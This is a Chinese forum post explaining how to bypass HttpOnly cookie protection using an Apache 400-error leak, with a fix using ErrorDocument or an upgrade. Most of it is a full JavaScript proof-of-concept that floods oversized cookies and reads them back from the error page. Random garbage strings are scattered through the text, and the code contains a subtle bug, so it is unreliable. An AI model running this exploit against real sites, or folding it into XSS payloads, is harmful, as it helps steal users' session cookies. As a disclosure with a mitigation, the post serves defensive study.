很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。2 |9 l1 E$ g. Y6 t4 O, U, Q/ \/ ?
& G' l- K- v9 S: ?1 ^& B3 }
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
6 A# Z/ Q v. m, H+ O/ x
5 g! C0 G, l; [$ A- F
/ P H8 k! W: Z' p) o// http://www.exploit-db.com/exploits/18442/% ^; c" _7 k m3 C- q3 x
function setCookies (good) {
2 y+ d0 f: f% }& U0 Q2 I* _# k6 Q4 m// Construct string for cookie value7 J. N4 n& K: y3 k, k h# q' A9 E
var str = "";
) W2 W9 w% W2 J0 K4 _8 ufor (var i=0; i< 819; i++) {+ @- u. x, V) e W" }1 ^# b
str += "x";
+ b- }; j+ t" O/ G8 f3 I4 G}
# F2 [3 a: M3 `3 ~// Set cookies
; v6 t+ N3 [7 q$ a( @! Y; z6 X$ Bfor (i = 0; i < 10; i++) {
; |& ^. C+ `0 E8 z v) ]% J// Expire evil cookie
7 l3 F" Y: T2 a; yif (good) {7 u& F! Z f5 O. B$ E, ?/ P+ j& k
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";& x4 u+ J* z& b( O/ Y' x
}. C) Y- P& r5 Y# @ C- i; E- {
// Set evil cookie T, J: G/ I" G" }# i' y! h0 [! |
else {
7 c* v/ I: I# w/ T2 G, n6 jvar cookie = "xss"+i+"="+str+";path=/";
O, v9 p7 Z3 g, Y5 h/ V+ K% h}
. x- \, Y5 i/ W5 O" V d1 ~document.cookie = cookie;
! k% [! d) w" @3 D1 H0 K/ B d$ T3 J}/ b3 O, v# o7 p2 F% E4 ?
}
- ]4 V$ n1 Q; l8 xfunction makeRequest() {
0 r' G4 _! e6 O4 ?; F% ~setCookies();" W0 c& z' c1 ~6 W' C6 m
function parseCookies () {
6 u) |' N8 F0 j6 Q4 g, Mvar cookie_dict = {};# q. N; l' A# o; q9 A5 a2 T
// Only react on 400 status
) V4 Z) @: ?( Yif (xhr.readyState === 4 && xhr.status === 400) {
$ F2 j3 O9 i+ O6 m// Replace newlines and match <pre> content+ e/ h: f5 J( }
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);5 d0 T& x& C" @# S3 ^/ M
if (content.length) {
0 P) c& @5 V. k// Remove Cookie: prefix
! Z9 p- x# `8 D3 y; {content = content[1].replace("Cookie: ", "");) K$ |4 ^8 p, b/ H8 D/ E$ Y- T9 u
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);; h6 E* m, z" N) D
// Add cookies to object8 A# ^; q: d# v4 v
for (var i=0; i<cookies.length; i++) {7 D+ k3 \3 R3 y, r
var s_c = cookies.split('=',2);5 f8 h+ h: E% S* W: u0 }% P% W- E
cookie_dict[s_c[0]] = s_c[1];7 @5 K& t0 ^# }9 Q' e
}) |* s: ]3 R/ C+ T i+ H9 R! O3 ^
}3 @ s0 ^, n" ]- v9 }* n# |
// Unset malicious cookies- Z5 `, J4 w7 \: {# Q H& h
setCookies(true);4 G1 b+ V' E' r6 o M1 s
alert(JSON.stringify(cookie_dict));
3 c! V6 d' j9 j$ E! H5 b# [1 [6 ]}
* [, k3 q- |8 V& K6 G}
/ d( z6 M8 ~' a% \" ]// Make XHR request: |1 s& d8 e" Y+ Y6 X
var xhr = new XMLHttpRequest();4 g. M# T6 ~" e8 T
xhr.onreadystatechange = parseCookies;, y" f9 m& k4 W, h: `6 Y- G
xhr.open("GET", "/", true);" Z4 u" ^, }0 J
xhr.send(null);
% e7 m+ H, J1 ^& i2 t1 K8 F}2 K4 [3 P3 v2 k2 `2 x S
makeRequest();8 ^3 m# w$ P6 q- d7 V; F
9 b3 t0 m' I) w: }* f- v: ^你就能看见华丽丽的400错误包含着cookie信息。0 V; l( e' H: {" e, B( [5 ~
0 R+ w2 r" h8 t; O( T4 x下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
! M0 ?9 U5 U5 Z, _) H- k
& ^/ q" I7 x6 @/ y5 R修复方案:2 f/ S5 K7 V/ S5 [3 L6 f; S
7 k2 a' E+ r* l$ ^
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下# P6 X' x/ B O
& m2 K3 V- b% e9 dIn the event of a problem or error, Apachecan be configured to do one of four things,% A. c+ N% C u3 M; C# Z
/ H* \" T) I+ h4 i2 N# r0 U6 \: c
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
3 F5 z' _0 K4 A: t5 V: `/ Z2. output acustomized message输出一段信息
6 O9 J2 G6 E- z7 P3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 + L* W! U5 L5 `$ s0 J6 z; ?
4. redirect to an external URL to handle theproblem/error转向一个外部URL) g/ Z9 }) ~' |$ C/ F" ^6 O3 ~
: e& ^; J, Y. S y3 N3 N* k
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容3 _ j+ M1 ^% H* a9 q
4 `0 F- r. \$ J5 e h
Apache配置:& E! g1 Q) V5 s! i
* g9 q& f& Z& O9 TErrorDocument400 " security test"
7 ^, l& U, {6 F. E
; k2 V& u+ c# Q% n' R当然,升级apache到最新也可:)。) a, k P1 v/ n w6 A0 T
5 Z6 E% _+ g& D6 f参考:http://httpd.apache.org/security/vulnerabilities_22.html
% n2 q8 i3 @& h2 e* R2 a& ?% i, ^- i# I7 ^' g @$ O. b
|
发表于 2013-4-19 19:15:43
收藏
支持
反对